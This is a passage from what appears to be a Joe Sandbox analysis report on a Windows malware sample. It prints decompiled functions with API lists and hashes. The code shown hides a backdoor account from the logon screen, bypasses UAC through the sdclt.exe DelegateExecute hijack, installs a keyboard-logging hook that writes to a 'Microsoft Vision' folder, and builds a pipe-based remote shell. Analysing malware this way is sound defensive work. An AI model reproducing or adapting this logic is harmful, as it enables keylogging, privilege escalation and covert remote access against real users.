					}
					_t56 = E0025D469();
					__eflags = _t56;
					if(_t56 != 0) {
						goto L14;
					}
					__eflags = E0025DB97() - 1;
					if(__eflags == 0) {
						_t162 = 8;
						E00253264(0x267d30, E002532D4( &_a4, _t162, __eflags));
						E00255A2D(_a4);
						_t163 = 8;
						E00253264(0x267d34, E002532D4( &_a4, _t163, __eflags));
						E00255A2D(_a4);
						_t172 = 0;
						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
						_v16 = 0;
						RegSetValueExW(_v12,  *0x267d30, 0, 4,  &_v16, 4);
						RegCloseKey(_v12);
						_t70 = E0025B799(0x267d30, 0x267d34);
						__eflags = _t70;
						if(_t70 != 0) {
							E0025F462(_a8, _t163, E00253412( &_a4, L"rudp"), 0x267d30);
							E00255A2D(_a4);
							E0025F462(_a8, _t163, E00253412( &_a8, L"rpdp"), 0x267d34);
							E00255A2D(_a8);
							E00251E6F(0x267cf0, E0025C57C, 0x267cd8);
							LeaveCriticalSection(0x267cd8);
							return 1;
						}
						E00254B53(_t167, E002547F1( &_v36, 9, 0x267d30, 0x267d34));
						E002547CE( &_v36);
						L12:
						LeaveCriticalSection(0x267cd8);
						return _t172;
					}
					E00254B53(_t167, E002547F1( &_v36, 1, 0x267d30, 0x267d34));
					E002547CE( &_v36);
					_t172 = 0;
					goto L12;
				}
				E00253264(0x267d30, E0025F495(_t111, _t161,  &_a8, E00253412( &_a4, L"rudp")));
				E00255A2D(_a8);
				_a8 = 0;
				E00255A2D(_a4);
				E00253264(0x267d34, E0025F495(_t111, _t161,  &_a8, E00253412( &_a4, L"rpdp")));
				E00255A2D(_a8);
				_a8 = 0;
				E00255A2D(_a4);
				if(E0025308E(0x267d30) != 0 || E0025308E(0x267d34) != 0) {
					E00254B53(_t167, E002547F1( &_v36, 8, 0x267d30, 0x267d34));
					E002547CE( &_v36);
				} else {
					_t104 = E00253412( &_a4, 0x262608);
					E00254B53(_t167, E002547F1( &_v36, 8, E00253412( &_a8, 0x262608), _t104));
					E002547CE( &_v36);
					E00255A2D(_a8);
					_a8 = 0;
					E00255A2D(_a4);
				}
				_t172 = 1;
				goto L12;
			}

















                                      0x0025c67e
                                      0x0025c68b
                                      0x0025c693
                                      0x0025c6a2
                                      0x0025c6ae
                                      0x0025c6b4
                                      0x0025c6b7
                                      0x0025c6ba
                                      0x0025c6c0
                                      0x0025c6ca
                                      0x0025c6d7
                                      0x0025c7d8
                                      0x0025c7dd
                                      0x0025c7e0
                                      0x0025c953
                                      0x0025c96a
                                      0x0025c972
                                      0x0025c978
                                      0x0025c97e
                                      0x00000000
                                      0x0025c97e
                                      0x0025c7e6
                                      0x0025c7eb
                                      0x0025c7ed
                                      0x00000000
                                      0x00000000
                                      0x0025c7f8
                                      0x0025c7fb
                                      0x0025c82a
                                      0x0025c839
                                      0x0025c841
                                      0x0025c848
                                      0x0025c859
                                      0x0025c861
                                      0x0025c869
                                      0x0025c883
                                      0x0025c88e
                                      0x0025c89e
                                      0x0025c8a7
                                      0x0025c8b3
                                      0x0025c8b8
                                      0x0025c8ba
                                      0x0025c907
                                      0x0025c90f
                                      0x0025c925
                                      0x0025c92d
                                      0x0025c942
                                      0x0025c948
                                      0x00000000
                                      0x0025c950
                                      0x0025c8cf
                                      0x0025c8d7
                                      0x0025c8dc
                                      0x0025c8e2
                                      0x00000000
                                      0x0025c8e8
                                      0x0025c814
                                      0x0025c81c
                                      0x0025c821
                                      0x00000000
                                      0x0025c821
                                      0x0025c6fc
                                      0x0025c704
                                      0x0025c70e
                                      0x0025c711
                                      0x0025c737
                                      0x0025c73f
                                      0x0025c747
                                      0x0025c74a
                                      0x0025c75b
                                      0x0025c7c3
                                      0x0025c7cb
                                      0x0025c768
                                      0x0025c771
                                      0x0025c78e
                                      0x0025c796
                                      0x0025c79e
                                      0x0025c7a6
                                      0x0025c7a9
                                      0x0025c7a9
                                      0x0025c7d2
                                      0x00000000

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0025C68B
                                      • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0025C6A2
                                      • EnterCriticalSection.KERNEL32(00267CD8,?,?), ref: 0025C6AE
                                        • Part of subcall function 0025C1A0: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00267CD8,?,?,0025C6D5,?,?), ref: 0025C1D2
                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0025C883
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0025C89E
                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 0025C8A7
                                      • LeaveCriticalSection.KERNEL32(00267CD8,00000000,00267D30,00267D34,?,?), ref: 0025C8E2
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025308E: lstrlenW.KERNEL32(?,00253473,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00253095
                                      • LeaveCriticalSection.KERNEL32(00267CD8,00000000,rpdp,00267D34,00000000,rudp,00267D30,00267D30,00267D34,?,?), ref: 0025C948
                                      • LeaveCriticalSection.KERNEL32(00267CD8,00000000,?,?), ref: 0025C978
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                      • String ID: 0}&$0}&$0}&$4}&$4}&$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                      • API String ID: 2046459734-3872354900
                                      • Opcode ID: 10b102356af43a51ab2846f450b2debc6e99261f5ec165b8b1529d1e30bb6d32
                                      • Instruction ID: cc20d33be39c360ccbe907b0e7831a51988c01af1a268ce3bf144917b5b85583
                                      • Opcode Fuzzy Hash: 10b102356af43a51ab2846f450b2debc6e99261f5ec165b8b1529d1e30bb6d32
                                      • Instruction Fuzzy Hash: 6A71E370630214ABCB00FB60DC96DBEB729AF19755F108424FD06A6192EF709E6DCF98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025F8C0, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 88sleepregistrystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E0025F8C0(void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				char _v1616;
				short* _t52;

				if(E0025DB97() != 1) {
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					if(_v8 != 0) {
						_t46 =  &_v12;
						E0025D5DB( &_v12);
					}
					E0025F6C1();
					E00251052( &_v1616, 0, 0x400);
					GetModuleFileNameA(0,  &_v1616, 0x400);
					E0025F65C(_t46, 0x264713,  &_v1616);
					E0025F65C(_t46, "DelegateExecute", 0x264713);
					GetSystemDirectoryW( &_v592, 0x104);
					lstrcatW( &_v592, L"\\sdclt.exe");
					_t52 = L"open";
					ShellExecuteW(0, _t52,  &_v592, 0, 0, 1);
					asm("movaps xmm0, [0x2649b0]");
					_v72.lpFile =  &_v592;
					_v72.cbSize = 0x3c;
					_v72.fMask = 0x40;
					_v72.hwnd = 0;
					_v72.lpVerb = _t52;
					asm("movups [ebp-0x30], xmm0");
					ShellExecuteExW( &_v72);
					TerminateProcess(_v72.hProcess, 0);
					if(_v8 != 0) {
						E0025D5B4( &_v12);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				return 0;
			}









                                      0x0025f8d3
                                      0x0025f8df
                                      0x0025f8e9
                                      0x0025f8f2
                                      0x0025f8f4
                                      0x0025f8f7
                                      0x0025f8f7
                                      0x0025f8fc
                                      0x0025f90f
                                      0x0025f920
                                      0x0025f933
                                      0x0025f93e
                                      0x0025f952
                                      0x0025f964
                                      0x0025f974
                                      0x0025f97c
                                      0x0025f982
                                      0x0025f98f
                                      0x0025f996
                                      0x0025f99d
                                      0x0025f9a4
                                      0x0025f9a7
                                      0x0025f9aa
                                      0x0025f9ae
                                      0x0025f9b8
                                      0x0025f9c1
                                      0x0025f9c6
                                      0x0025f9c6
                                      0x0025f9d0
                                      0x0025f9e0
                                      0x0025f9e7
                                      0x0025f9e7
                                      0x0025f9f2

                                      APIs
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0025F8E2
                                      • IsWow64Process.KERNEL32(00000000), ref: 0025F8E9
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0025F920
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0025F952
                                      • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0025F964
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0025F97C
                                      • ShellExecuteExW.SHELL32(?), ref: 0025F9AE
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0025F9B8
                                      • Sleep.KERNEL32(000007D0), ref: 0025F9D0
                                      • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0025F9E0
                                      • ExitProcess.KERNEL32 ref: 0025F9E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExecuteShellToken$CloseDeleteDirectoryExitFileHandleInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                      • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                      • API String ID: 194334098-2081737068
                                      • Opcode ID: c25418991aaaef46268e3c19cebd0dce2e3f7554f7b3bb926c36cd38b1c0b3c4
                                      • Instruction ID: bdf7f10dfcca6c27110ba841c2cedd7b66806f77c8315b267fa3765187288f81
                                      • Opcode Fuzzy Hash: c25418991aaaef46268e3c19cebd0dce2e3f7554f7b3bb926c36cd38b1c0b3c4
                                      • Instruction Fuzzy Hash: 77317EB1812518EBDB21EBA4ED4DEDEBBBCEF45701F0040A6FA09A2160D7744A59CB64
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 002574B4, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135windowstringfileUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E002574B4(void* __edx, void* __eflags) {
				short _v176;
				struct tagMSG _v204;
				void* _v208;
				struct _SYSTEMTIME _v228;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t40;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				void* _t59;
				struct HINSTANCE__* _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t90;

				_t90 = __eflags;
				_t71 = __edx;
				_t19 = GetModuleHandleA(0);
				_t62 =  *0x266690; // 0x0
				_t60 = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00251052(_t62 + 0x210, 0, 0x800);
				_t22 =  *0x266690; // 0x0
				E00251052(_t22 + 0x10, 0, 0x208);
				_t25 =  *0x266690; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
				_t27 =  *0x266690; // 0x0
				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v228);
				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
				_t40 =  *0x266690; // 0x0
				lstrcatW(_t40 + 0x10,  &_v176);
				_t64 =  *0x266690; // 0x0
				_t11 = _t64 + 0x10; // 0x10
				E0025312C(_t64 + 0xc, _t71, _t11);
				_t45 =  *0x266690; // 0x0
				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t66 =  *0x266690; // 0x0
				 *(_t66 + 4) = _t46;
				CloseHandle(_t46);
				_v228.wYear = 0;
				_t68 = E0025FC79("c:\\windows\\system32\\user32.dll",  &_v228);
				_t49 = E0025E970(_t68, 0, _t90);
				_t91 = _t49;
				if(_t49 == 0) {
					_t50 =  *0x26668c; // 0x0
				} else {
					_push(_t68);
					_t50 = E0025E907(_t49, "SetWindowsHookExA", _t91);
					 *0x26668c = _t50;
				}
				 *_t50(0xd, E00257645, _t60, 0);
				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
					TranslateMessage( &_v204);
					DispatchMessageA( &_v204);
				}
				return 0;
			}


























                                      0x002574b4
                                      0x002574b4
                                      0x002574c5
                                      0x002574cb
                                      0x002574d5
                                      0x002574df
                                      0x002574e5
                                      0x002574e6
                                      0x002574e7
                                      0x002574ec
                                      0x002574f1
                                      0x00257503
                                      0x00257508
                                      0x00257519
                                      0x0025751f
                                      0x00257533
                                      0x0025753a
                                      0x0025756e
                                      0x0025757c
                                      0x00257585
                                      0x00257587
                                      0x0025758d
                                      0x00257594
                                      0x00257599
                                      0x002575b1
                                      0x002575b7
                                      0x002575be
                                      0x002575c1
                                      0x002575cb
                                      0x002575db
                                      0x002575dd
                                      0x002575e2
                                      0x002575e4
                                      0x002575fb
                                      0x002575e6
                                      0x002575e6
                                      0x002575ee
                                      0x002575f4
                                      0x002575f4
                                      0x00257609
                                      0x0025762c
                                      0x0025761b
                                      0x00257626
                                      0x00257626
                                      0x00257642

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 002574C5
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00257519
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00257533
                                      • GetLocalTime.KERNEL32(?), ref: 0025753A
                                      • wsprintfW.USER32 ref: 0025756E
                                      • lstrcatW.KERNEL32(-00000010,?), ref: 00257585
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 002575B1
                                      • CloseHandle.KERNEL32(00000000), ref: 002575C1
                                        • Part of subcall function 0025FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0025FCA6
                                        • Part of subcall function 0025FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00252B6F), ref: 0025FCB1
                                        • Part of subcall function 0025FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0025FCC2
                                        • Part of subcall function 0025FC79: CloseHandle.KERNEL32(00000000), ref: 0025FCC9
                                        • Part of subcall function 0025E970: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,757C68BC,00000000,?,?,?,?,002575E2), ref: 0025E99C
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00257634
                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      • TranslateMessage.USER32(?), ref: 0025761B
                                      • DispatchMessageA.USER32(?), ref: 00257626
                                      Strings
                                      • c:\windows\system32\user32.dll, xrefs: 002575CF
                                      • SetWindowsHookExA, xrefs: 002575E7
                                      • \Microsoft Vision\, xrefs: 0025752D
                                      • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00257568
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                      • API String ID: 1431388325-3884914687
                                      • Opcode ID: d2ffda0c3d0f0d4a202ab5e0f161f9a4f84c32a0c38adf1c9469be1b8b389dd5
                                      • Instruction ID: ae11afe123cdfc27a00052b581584bee6dece79fce94bce4146257588dea7a8d
                                      • Opcode Fuzzy Hash: d2ffda0c3d0f0d4a202ab5e0f161f9a4f84c32a0c38adf1c9469be1b8b389dd5
                                      • Instruction Fuzzy Hash: 8B41BFB1514201ABD7149BA9FC0DF2B77ECFB88705F008919FE49D3191D6B8E928CB65
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025CD2C, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 135pipethreadUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025CD2C(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E0025CCBA(0x266550);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E0025CEBD( &_v12);
					E0025CEBD( &_v8);
					E0025CEBD( &_v16);
					E0025CEBD( &_v20);
					E0025CEBD( &_v24);
					E0025CCBA(0x266550);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x266558, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x26655c, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E0025CEBD( &_v12);
								E0025CEBD( &_v20);
								E0025345A(_t95,  &_a4);
								if(E0025CACA(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E0025CEBD( &_v8);
									E0025CEBD( &_v24);
									E0025CEBD( &_v16);
									 *0x266560 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E0025CB63, 0x266550, 0, 0x266568);
									 *0x266564 = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				E00255A2D(_a4);
				return _t94;
			}
















                                      0x0025cd3a
                                      0x0025cd3f
                                      0x0025cd46
                                      0x0025cd4c
                                      0x0025cd50
                                      0x0025cd51
                                      0x0025cd55
                                      0x0025cd59
                                      0x0025cd63
                                      0x0025cd6e
                                      0x0025cd7a
                                      0x0025ce78
                                      0x0025ce7b
                                      0x0025ce83
                                      0x0025ce8b
                                      0x0025ce93
                                      0x0025ce9b
                                      0x0025cea5
                                      0x0025ceaa
                                      0x0025cd80
                                      0x0025cd8f
                                      0x0025cda2
                                      0x00000000
                                      0x0025cdc4
                                      0x0025cdcf
                                      0x0025cddc
                                      0x00000000
                                      0x0025cde2
                                      0x0025cded
                                      0x0025cdf6
                                      0x0025cdf8
                                      0x0025cdfa
                                      0x00000000
                                      0x0025cdfc
                                      0x0025cdff
                                      0x0025ce07
                                      0x0025ce1c
                                      0x0025ce28
                                      0x00000000
                                      0x0025ce2a
                                      0x0025ce2d
                                      0x0025ce35
                                      0x0025ce3d
                                      0x0025ce64
                                      0x0025ce69
                                      0x0025ce6f
                                      0x0025ce76
                                      0x00000000
                                      0x00000000
                                      0x0025ce76
                                      0x0025ce28
                                      0x0025cdfa
                                      0x0025cddc
                                      0x0025cda2
                                      0x0025ceaf
                                      0x0025ceba

                                      APIs
                                        • Part of subcall function 0025CCBA: GetCurrentThreadId.KERNEL32(?,00000000,0025292E,00000000,exit,00000000,start), ref: 0025CCC6
                                        • Part of subcall function 0025CCBA: SetEvent.KERNEL32(00000000), ref: 0025CCDA
                                        • Part of subcall function 0025CCBA: WaitForSingleObject.KERNEL32(00266564,00001388), ref: 0025CCE7
                                        • Part of subcall function 0025CCBA: TerminateThread.KERNEL32(00266564,000000FE), ref: 0025CCF8
                                      • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0025CD72
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0025CD8F
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0025CD95
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0025CD9E
                                      • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0025CDB6
                                      • GetCurrentProcess.KERNEL32(00266558,00000000,00000000,00000002,?,00000000), ref: 0025CDCF
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0025CDD5
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0025CDD8
                                      • GetCurrentProcess.KERNEL32(0026655C,00000000,00000000,00000002,?,00000000), ref: 0025CDED
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0025CDF3
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0025CE49
                                      • CreateThread.KERNEL32(00000000,00000000,0025CB63,00266550,00000000,00266568), ref: 0025CE69
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0025CDF6
                                        • Part of subcall function 0025CEBD: CloseHandle.KERNEL32(00266560), ref: 0025CEC7
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025CACA: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0025CB1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                      • String ID: Pe&$Pe&
                                      • API String ID: 337272696-560627266
                                      • Opcode ID: 388600f0c763fb5f7f7bb436d50ec634e801f78d9ec98332775df2d8e86f87bc
                                      • Instruction ID: 42efdd72b29e54c108c180d7cf4c3f3288cc7e0521d185217bf1365d334ca3cb
                                      • Opcode Fuzzy Hash: 388600f0c763fb5f7f7bb436d50ec634e801f78d9ec98332775df2d8e86f87bc
                                      • Instruction Fuzzy Hash: 08410371960309BEDB14EBE1DC4BFEE77B8AF14706F604416F901B60D1EB749A18CA68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00257AEB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147filestringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00257AEB(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E00251052( &_v536, 0, 0x208);
				_v8 = 0;
				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E0025312C( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E00253412( &_v12,  &_v536);
					E00253162(E00253297( &_v8, _t94, _t106, "{"), _t106, _t73);
					E00253297(_t74, _t94, _t106, "}");
					E00255A2D(_v12);
					_v12 = 0;
				}
				_t37 =  *0x266690; // 0x0
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x266690; // 0x0
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x266690; // 0x0
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t70 = E00253075( &_v8, E00253412( &_v12, _t40 + 0x210));
					E00255A2D(_v12);
					_t40 =  *0x266690; // 0x0
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x266690; // 0x0
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x8
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x266690; // 0x0
					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
					_t57 =  *0x266690; // 0x0
					_t59 = E0025308E( &_v8);
					_t61 =  *0x266690; // 0x0
					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x266690; // 0x0
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x266690; // 0x0
					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x266690; // 0x0
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x8
				_t46 = lstrlenW(_t97);
				_t48 =  *0x266690; // 0x0
				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x266690; // 0x0
				CloseHandle( *(_t50 + 4));
				return E00255A2D(_v8);
			}
































                                      0x00257aeb
                                      0x00257afe
                                      0x00257b09
                                      0x00257b11
                                      0x00257b27
                                      0x00257b2d
                                      0x00257b2f
                                      0x00257b7a
                                      0x00257b31
                                      0x00257b3b
                                      0x00257b54
